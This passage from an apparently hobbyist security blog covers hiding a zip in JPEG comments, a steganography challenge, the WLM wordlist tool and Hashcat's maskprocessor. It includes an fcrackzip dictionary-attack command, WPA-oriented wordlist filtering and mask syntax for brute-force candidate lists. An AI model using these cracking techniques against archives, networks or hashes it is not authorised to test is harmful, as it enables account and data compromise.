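SAMPLE_JPEG = b"\xff\xd8" + JFIF_APP0 + b"\xff\xda\x00\x02" + b"\xff\xd9"
# Constructed stand-in for pass.zip; a real run would pass in the bytes produced by 'zip pass.zip -e'.
SAMPLE_PAYLOAD = b"PK\x03\x04 constructed zip bytes"

if __name__ == "__main__":
    stego = hide_payload(SAMPLE_JPEG, SAMPLE_PAYLOAD)
    print(jpeg_comments(stego)[0])
    print(recover_payload(stego) == SAMPLE_PAYLOAD)
```

Rotation and base64 are reversible without any key, so the only secret in the scheme is the zip password; listing COM segments with jpeg_comments (or exiftool) exposes the whole blob at once, which is why the method is described further down as not terribly secure.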
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass2.png" /></a></div>
<br />
(password hint; <a href="http://www.mediafire.com/file/i7iidriywydcaal/worst_500_passwords.txt" target="_blank">worst 500 passwords</a>)<br />
<span style="color: lime;">fcrackzip -Dp worst_500_passwords.txt -uv pass.zip</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass3.png" /></a></div>
<br />
A highly cumbersome and not terribly secure method of doing something simple, but still food for thought on what is possible on hiding information in 'plain sight'.<br />
<br />
<br />
<br />
<b>Team THS Challenge </b><br />
<b>================</b><br />
I made the below file for the <a href="http://top-hat-sec.com/forum/index.php" target="_blank">Top Hat Security team</a> for an article on this same subject in our members' magazine, based on the above possibilities.<br />
See what you can discover and post the outcome here or on the <a href="http://top-hat-sec.com/forum/index.php" target="_blank">THS forums</a> !<br />
<br />
Download the challenge (challenge.jpg) here ;<br />
<a href="http://www.mediafire.com/?4sgybntg3qy60ov" target="_blank"><b><span style="color: red;">http://www.mediafire.com/?4sgybntg3qy60ov</span></b></a><br />
<br />
<br />
<i><b><span style="color: red;">Edit dd 04-02-2013</span></b></i><br />
No takers / results on the above THS challenge.jpg file ?!<br />
<br />
Some hints then..<br />
The file challenge.jpg contains a password protected zip file, the contents of which can be<br />
extracted with a password that can be found in the challenge.jpg image data..<br />
<br />
The challenge.jpg actually contains 4 images (including challenge.jpg itself) and the final outcome<br />
of the challenge should be a text file starting with ;<br />
<br />
<i><span style="color: yellow;">Well done ! </span></i><br />
<span style="color: yellow;"><i><br /></i>
<i>Challenge complete, hope it was enjoyable !</i></span><br />
<br />
All required processes are described in the above post, but if you're stuck, leave a comment<br />
with what you have done / tried and I will see if it merits a response ;)<br />
<br />
<br />
<br />
<b>CREDITS/LINKAGE ;</b><br />
<b>==================</b><br />
<b><u>Top Hat Security</u></b><br />
<a href="http://top-hat-sec.com/main/">http://top-hat-sec.com/main/</a><br />
<b><u>Exiftool</u></b><br />
<a href="http://www.sno.phy.queensu.ca/~phil/exiftool/" target="_blank">http://www.sno.phy.queensu.ca/~phil/exiftool/</a><br />
<b><u>Exiftool GUI</u></b><br />
<a href="http://freeweb.siol.net/hrastni3/foto/exif/exiftoolgui.htm" target="_blank">http://freeweb.siol.net/hrastni3/foto/exif/exiftoolgui.htm</a><br />
<b><u>Exiftool forums</u></b><br />
<a href="http://u88.n24.queensu.ca/exiftool/forum/index.php" target="_blank">http://u88.n24.queensu.ca/exiftool/forum/index.php</a><br />
<b><u>HxD Hex Editor</u></b><br />
<a href="http://mh-nexus.de/en/hxd/" target="_blank">http://mh-nexus.de/en/hxd/</a><br />
<b><u>Steghide</u></b><br />
<a href="http://steghide.sourceforge.net/download.php" target="_blank">http://steghide.sourceforge.net/download.php</a><br />
<b><u>Stegdetect - Outguess</u></b><br />
<a href="http://www.outguess.org/detection.php" target="_blank">http://www.outguess.org/detection.php</a><br />
<b><u>Stepic</u></b><br />
<u><a href="http://domnit.org/blog/2007/02/stepic-explanation.html">http://domnit.org/blog/2007/02/stepic-explanation.html</a></u><br />
<b><u>File Signatures</u></b><br />
<a href="http://www.garykessler.net/library/file_sigs.html" target="_blank">http://www.garykessler.net/library/file_sigs.html</a><br />
<br />
Some incredibly annoying challenges can be found here ;<br />
<a href="http://www.wixxerd.com/challenges/">http://www.wixxerd.com/challenges/</a><br />
<br />
<br />
<b><u><br /></u></b>
</div>
<b>Manipulating wordlists with WLM (Wordlist Manipulator)</b> (posted 2012-10-26, updated 2013-02-07)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Wordlist Manipulator</b><br />
<b>=================</b><br />
<b><br /></b>
<b><i><span style="color: red;">Post still to be fully completed</span></i></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm_v0-7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm_v0-7.png" /></a></div>
<br />
WLM WIKI<br />
<b><a href="http://code.google.com/p/wordlist-manipulator/w/list" target="_blank">http://code.google.com/p/wordlist-manipulator/w/list</a></b><br />
<br />
Google Code main page ;<br />
<a href="http://code.google.com/p/wordlist-manipulator/" target="_blank"><b>http://code.google.com/p/wordlist-manipulator/</b></a><br />
<br />
<b>Video using WLM (old version v0.5) on BackBox ; </b><br />
<div class="separator" style="clear: both; text-align: left;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/FpflByHLp1I?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
Wordlists are an integral part of many checks/audits and being able to ensure the wordlists meet your needs is imperative.<br />
Of course when creating a wordlist you try to ensure that it is going to be as tailor made as possible, however sometimes you may want to adjust an existing wordlist to some extent.<br />
<br />
WLM is a script which basically bundles a whole load of text-processing commands into a menu structure, giving an easy overview of the most commonly used/requested wordlist alterations.<br />
<br />
WLM was only made to work on Linux-based systems; it has been tested with good results on BackTrack and BackBox Linux, but I cannot advise whether it works on any other OS/distro.<br />
<br />
<br />
INSTALLATION<br />
<b>=============</b><br />
<a href="http://www.backbox.org/" target="_blank">BackBox Linux</a> developer ZEROF has been kind enough to make <a href="http://forum.backbox.org/videos/wordlist-manipulation-on-backbox/msg4846/#msg4846" target="_blank">a debian package</a> for easy installation on BackBox Linux which can be installed on BackBox as below ;<br />
<br />
Open terminal and type:<br />
<br />
<div>
<b>wget http://wordlist-manipulator.googlecode.com/files/wlm-0.8_all.deb</b></div>
<div>
<b>sudo dpkg -i wlm-0.8_all.deb</b></div>
<div>
To use the tool type <span style="color: lime;"><b>wlm</b></span> in a terminal or open <i>BackBox menu</i> -> <i>Auditing</i> -> <i>Miscellaneous</i> -> wlm</div>
<br />
<br />
For BackTrack, simply download the script to a directory of your choice.<br />
<div>
After downloading the code and saving it as 'wlm', the file needs to be made executable as follows ;</div>
<b><span style="color: lime;">chmod +x wlm</span></b><br />
The script can then be run from that same directory with<span style="color: lime;"> <b>./wlm</b></span><br />
<div>
<br /></div>
<br />
The code can be reviewed here ;<br />
<a href="http://code.google.com/p/wordlist-manipulator/source/browse/wlm" target="_blank">http://code.google.com/p/wordlist-manipulator/source/browse/wlm</a><br />
<div>
<br /></div>
<br />
Script (v0.7) can also be downloaded here ;<br />
<a href="http://www.mediafire.com/file/p1tn76qw95hobi4/wlm">http://www.mediafire.com/file/p1tn76qw95hobi4/wlm</a><br />
<div>
<br /></div>
<div>
<br /></div>
<br />
<b>BASIC USAGE</b><br />
<b>============</b><br />
<br />
If you have installed on BackBox with the debian package, then there is no need to do anything else.<br />
<div>
<div>
<br /></div>
<div>
For use in BackBox when installed using the debian package, simply type 'wlm' followed by a word to give all possible permutations of that word ;</div>
</div>
<br />
<b><span style="color: lime;">wlm one</span></b><br />
<b><span style="color: lime;">wlm ten</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm01-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm01-1.png" /></a></div>
<br />
Or simply type wlm and hit Enter to get the main options menu.<br />
<b><span style="color: lime;">wlm</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm02.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="468" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm02.png" width="640" /></a></div>
<br />
Or go to the <b><i>BBox menu</i></b> > <b><i>Auditing</i></b> > <b><i>Miscellaneous</i></b> > <b>wlm </b><br />
which will also give you the main options menu.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm03-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="344" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm03-1.jpg" width="640" /></a></div>
<br />
In BackBox you can of course also simply download the script, make it executable and run it from that directory with<b> <span style="color: lime;">./wlm</span></b>, the same as you would in BackTrack ;<br />
<br />
You can test all possible permutations of a word by typing ./wlm followed by a word (for instance 'one')<br />
<b><span style="color: lime;">./wlm one</span></b><br />
<br />
Or you can simply type ./wlm and hit Enter to get the main options menu.<br />
<b><span style="color: lime;">./wlm</span></b><br />
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>ALL OPTIONS</b></div>
<div>
<b>============</b></div>
<div>
<br /></div>
<div>
Each main option has a submenu and the full range of options is ; </div>
<div>
<br /></div>
<div>
<div>
<b>1. Case Options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Change case of first letter of each word in the wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Change case of last letter of each word in the wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Change all lower case to upper case.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.4<span class="Apple-tab-span" style="white-space: pre;"> </span>Change all upper case to lower case.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>1.5<span class="Apple-tab-span" style="white-space: pre;"> </span>Invert case of each letter in each word.</div>
<div>
<br /></div>
<div>
<b>2. Combination options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>2.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Combine words from 1 list to all words in another list.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>2.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Combine all wordlists in a directory into 1 wordlist.</div>
<div>
<br /></div>
<div>
<b>3. Prefix characters to wordlist</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>3.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Prefix numeric values in sequence (ie. 0-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>3.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Prefix fixed number of numeric values in sequence (ie. 000-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>3.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Prefix a word or characters to wordlist.</div>
<div>
<br /></div>
<div>
<b>4. Append / Suffix characters to wordlist</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>4.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Suffix numeric values in sequence (ie. 0-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>4.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Suffix fixed number of numeric values in sequence (ie. 000-999)</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>4.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Suffix a word or characters to wordlist.</div>
<div>
<br /></div>
<div>
<b>5. Include characters</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>5.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Include characters from a certain position from start of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>5.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Include characters from a certain position from end of word.</div>
<div>
<br /></div>
<div>
<b>6. Substitute/Replace characters</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>6.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Substitute/Replace characters from start of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>6.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Substitute/Replace characters from end of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>6.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Substitute/Replace characters at specified positions in list.</div>
<div>
<br /></div>
<div>
<b>7. Optimize / tidy up wordlist</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>7.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Full optimization of wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>7.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Optimize for WPA (min 8 chars max 63 chars).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>7.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Sort words based on wordlength</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>(can help process speed with some programmes such as cRARk)</div>
<div>
<br /></div>
<div>
<b>8. Split options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>8.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Split wordlists based on a user defined max linecount in each split file.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>8.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Split wordlists based on a user defined max size of each split file.</div>
<div>
<br /></div>
<div>
<b>9. Removal / Deletion options</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove characters at a certain position from start of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove characters at a certain position before end of word.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove specific characters globally from words.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.4<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words containing specific characters from wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.5<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words with more than X number of identical adjacent characters from wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.6<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words existing in 1 list from another list (test version only for small lists).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.7<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words that do not have X number of numeric values.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.8<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words that have X number of repeated characters.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>9.9<span class="Apple-tab-span" style="white-space: pre;"> </span>Remove words of a certain length.</div>
<div>
<br /></div>
<div>
<b>10. Miscellaneous fun</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.1<span class="Apple-tab-span" style="white-space: pre;"> </span>Check possible wordlist sizes (with same min-max length only).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.2<span class="Apple-tab-span" style="white-space: pre;"> </span>Create a wordlist from a range of dates (datelist).</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.3<span class="Apple-tab-span" style="white-space: pre;"> </span>Strip SSIDs from a kismet generated .nettxt file.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.4<span class="Apple-tab-span" style="white-space: pre;"> </span>Basic leetify options for wordlist.</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>10.5 Leetify/Permute wordlist (Gitsnik's permute.pl script).</div>
<div>
<br /></div>
<div>
<b>f. File information</b>;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>Gives information on aspects of selected file ;</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Filetype</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Wordcount of file</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Longest line</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- File Size</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>- first 3 and last 3 lines of file</div>
<div>
<br /></div>
<div>
<b>h. Version and help information</b>.</div>
</div>
<div>
<br /></div>
<div>
<b>u. Check for updates to the script</b>.</div>
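To make concrete what a few of the menu options above do to a list, here is an added Python example; it is my own code, not WLM's (which is a bash script), and the function names are this example's own. It implements options 1.1, 3.1/3.2, 4.1/4.2, 7.2, 7.3 and 9.5 plus the file-information summary, run over a constructed sample list that contains the usual junk (duplicates, a stray line ending, out-of-range lengths).

```python
import re


def toggle_first_letter(words):
    """Option 1.1: flip the case of the first character of every word."""
    return [w[0].swapcase() + w[1:] if w else w for w in words]


def prefix_sequence(words, start, stop, width=0):
    """Options 3.1/3.2: prefix each number start..stop to every word; width > 0 zero-pads (000-999 style)."""
    return [str(n).zfill(width) + w for n in range(start, stop + 1) for w in words]


def suffix_sequence(words, start, stop, width=0):
    """Options 4.1/4.2: the same numbers, appended instead."""
    return [w + str(n).zfill(width) for w in words for n in range(start, stop + 1)]


def optimize_for_wpa(words):
    """Option 7.2: strip line endings, drop duplicates, keep only 8-63 character candidates,
    the passphrase length limits of WPA-PSK. Anything outside that range can never match."""
    seen = set()
    out = []
    for w in words:
        w = w.rstrip("\r\n")
        if 8 <= len(w) <= 63 and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def drop_adjacent_repeats(words, max_run):
    """Option 9.5: remove words with more than max_run identical adjacent characters."""
    pattern = re.compile(r"(.)\1{%d,}" % max_run)
    return [w for w in words if not pattern.search(w)]


def sort_by_length(words):
    """Option 7.3: stable sort on word length."""
    return sorted(words, key=len)


def file_information(words):
    """Option f: the summary WLM prints for a file (count, longest line, head and tail)."""
    return {
        "wordcount": len(words),
        "longest": max((len(w) for w in words), default=0),
        "head": words[:3],
        "tail": words[-3:],
    }


# Constructed sample wordlist, including the junk a real list tends to contain.
SAMPLE_WORDLIST = ["password", "Password", "aaaa1234", "short", "letmein1", "letmein1",
                   "x" * 70, "hello world\n"]

if __name__ == "__main__":
    clean = optimize_for_wpa(SAMPLE_WORDLIST)
    print(clean)
    print(drop_adjacent_repeats(clean, 2))
    print(prefix_sequence(toggle_first_letter(clean[:1]), 0, 2))
    print(file_information(clean))
```

The order matters: tidy first (7.x and 9.x), then expand (3.x/4.x), otherwise every prefix and suffix is generated for junk entries that a later filter throws away anyway.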
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>GENERAL USAGE </b></div>
<div>
<b>================</b></div>
<div>
<br /></div>
<div>
Choose the desired option and the submenu option as appropriate. </div>
<div>
<br /></div>
<div>
You will be prompted to enter the /path/to/wordlist which you want to modify</div>
<div>
There is <b><i>no auto-complete</i></b> on this, so the correct path syntax and correct spelling is imperative !</div>
<div>
<br /></div>
<div>
You will then be prompted to specify a filename for the resulting altered wordlist.</div>
<div>
Again, there is <b><i>no auto-complete</i></b> on this, so the correct path syntax and correct spelling is imperative !</div>
<div>
<br /></div>
<div>
<i>(You can actually also browse to the wordlists in File Manager and drag and drop in the wlm terminal)</i></div>
<div>
<br /></div>
<div>
Depending on the option chosen, you may be prompted for more input. </div>
<div>
<br /></div>
<div>
In the example below, I have chosen Option 1 (Case Options) followed by Sub-Menu option 1 (Change case of first letter)</div>
<div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm04-2.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="525" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm04-2.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
The principle for all other options from 1 - 9 is the same ; </div>
<div>
> Enter filename to be altered </div>
<div>
> Enter output filename</div>
<div>
> Provide further input as prompted/required.</div>
<div>
<br /></div>
<div>
Should you risk overwriting an existing file, then wlm will warn you of this so you can cancel without making any changes. </div>
<div>
<br /></div>
<div>
<br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ScreenshotWLM05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ScreenshotWLM05.jpg" width="640" /></a></div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
<b><i>!NOTE! </i></b><br />
<div>
<b><i>If using BBox and you may be overwriting files, then wlm may need to be run as root !</i></b><br />
<br />
<div>
<div>
(BackTrack runs root as standard, so no special measures required when using in BackTrack)</div>
<div>
</div>
</div>
<div>
</div>
</div>
<div>
<br />
If running BBox and you may need to overwrite existing files, start wlm in a terminal (not from the menu) with;<br />
<b><span style="color: lime;">sudo wlm</span></b></div>
<div>
<b><span style="color: lime;"><br /></span></b></div>
<br />
<br />
<br />
<br /></div>
</div>
<b>Vytautas Mineral Water</b> (posted 2012-04-01)<br />
F*** Yeah ;)<br />
<br />
Random post despite the after warning :D<br />
<br />
This sh*t has to be legit, I wants it ;)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dzutkNoOYuR1knS3Rk4GEvFDlODy6HNwdpVfsSsZBLA_ALe2Ca3dHfjKtFqfhQBh3YWE-vKtr5TBprwRVpOzQ' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<b>Hashcat's Maskprocessor</b> (posted 2012-02-21, updated 2012-03-04)<br />
<b><span style="color: red;">Work in progress, post still to be fully completed.</span></b><br />
<b><br />
</b><br />
<b>Creating wordlists for piping through to oclHashcat.</b><br />
<br />
Maskprocessor is a highly configurable, high-performance wordlist generator which can be run under<br />
either Linux or Windows (yay, I can continue to be lazy ;) )<br />
It is blisteringly fast.<br />
<br />
Output from maskprocessor can be piped to for instance oclHashcat+ for hash cracking.<br />
<br />
Installing maskprocessor on BackTrack 5 ;<br />
<span style="color: lime;">apt-get update</span><br />
<span style="color: lime;">apt-get install maskprocessor</span><br />
However, at the time of writing (21-02-2012) the version in the BackTrack repositories is out of date and missing the increment options.<br />
(backtrack's version is v0.65 whereas latest version is v0.67)<br />
<i>With the recently released (01-03-2012) BT5R2 repositories however the latest version </i><br />
<i>is included. </i><br />
<br />
<span style="color: lime;">cd /pentest/passwords/maskprocessor/</span><br />
<span style="color: lime;">./mp32.bin --help</span><br />
<span style="color: lime;">./mp32.bin -V</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp01.jpg" width="640" /></a></div><br />
<br />
Info and download latest version ;<br />
<a href="http://hashcat.net/wiki/maskprocessor" target="_blank">http://hashcat.net/wiki/maskprocessor</a><br />
<br />
So download the version your system requires (either 32-bit or 64-bit) and replace the .bin file in the /pentest/passwords/maskprocessor/ directory with it.<br />
With the latest version increment options are now available.<br />
<span style="color: lime;">./mp32.bin --help</span><br />
<span style="color: lime;">./mp32.bin -V</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="532" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp02.jpg" width="640" /></a></div><br />
<br />
<b>CREATING WORDLISTS WITH MASKPROCESSOR</b><br />
As seen in the above help information, maskprocessor comes with several pre-defined charsets as in oclHashcat+, among which;<br />
<br />
<span style="color: yellow;">?l</span> -- lower case alpha values<br />
<span style="color: yellow;">?u</span> -- upper case alpha values<br />
<span style="color: yellow;">?d</span> -- numeric values<br />
<span style="color: yellow;">?s</span> -- special characters including space<br />
<br />
Up to 4 custom charsets can be defined using the switches -1, -2, -3, -4, for example ;<br />
<span style="color: yellow;">-1</span> ?dABCDEF (0123456789ABCDEF)<br />
<span style="color: yellow;">-2</span> QWERTY (just the letters QWERTY)<br />
<span style="color: yellow;">-3</span> ?u123 (uppercase alpha values & 123)<br />
<span style="color: yellow;">-4</span> ?l?u?d?s (lower & upper alpha-numeric-special)<br />
<br />
<i>In the below examples I will not be writing to file and just showing the stdout of the command given. </i><br />
<i>To actually write the output to file you would simply include the -o switch ; </i><br />
<i><span style="color: lime;">./mp32.bin ?d?d?d?d?d?d?d?d?d?d -o wordlist.txt </span></i><br />
<i>Remember that wordlist sizes can quickly become large and impractical.</i><br />
<br />
Creating an 8 character lower alpha wordlist<br />
from aaaaaaaa to zzzzzzzz ;<br />
<span style="color: lime;">./mp32.bin ?l?l?l?l?l?l?l?l </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp03.jpg" width="640" /></a></div><br />
<br />
Creating an 8 character upper alpha wordlist<br />
from AAAAAAAA to ZZZZZZZZ ;<br />
<span style="color: lime;">./mp32.bin ?u?u?u?u?u?u?u?u </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp04.jpg" width="640" /></a></div><br />
<br />
Creating an 8 character numeric wordlist<br />
from 00000000 to 99999999 ;<br />
<span style="color: lime;">./mp32.bin ?d?d?d?d?d?d?d?d </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp05.jpg" width="640" /></a></div><br />
<br />
The masks can be changed to what you may require to either fix certain character values at certain positions<br />
or to have multiple charsets at given positions using custom charset masks.<br />
<br />
To create a wordlist with the first 4 characters being numeric values and the last 4 characters being upper case alpha values<br />
from 0000AAAA to 9999ZZZZ ;<br />
<br />
<span style="color: lime;">./mp32.bin ?d?d?d?d?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp06.jpg" width="640" /></a></div><br />
To create a wordlist with lower alpha and numeric values<br />
<i>(note that the order in which you define the custom charset determines the order in which the words are </i><i>printed, but not the final content of the wordlist)</i><br />
from aaaaaaaa to 99999999 ;<br />
<br />
<span style="color: lime;">./mp32.bin -1 ?l?d ?1?1?1?1?1?1?1?1 </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp07.jpg" width="640" /></a></div><br />
To create a wordlist with the first 4 characters being lower and upper case alpha values and the last 4 characters being numeric values<br />
from aaaa0000 to ZZZZ9999 ;<br />
<br />
<span style="color: lime;">./mp32.bin -1 ?l?u ?1?1?1?1?d?d?d?d</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp08.jpg" width="640" /></a></div><br />
To create an 8 character wordlist with the 1st and 2nd characters being lower and upper case alpha values, the 3rd to 6th characters being (upper case) hexadecimal values and the last 2 characters being special characters (including space); <br />
<br />
<span style="color: lime;">./mp32.bin -1 ?l?u -2 ?dABCDEF ?1?1?2?2?2?2?s?s </span><br />
<br />
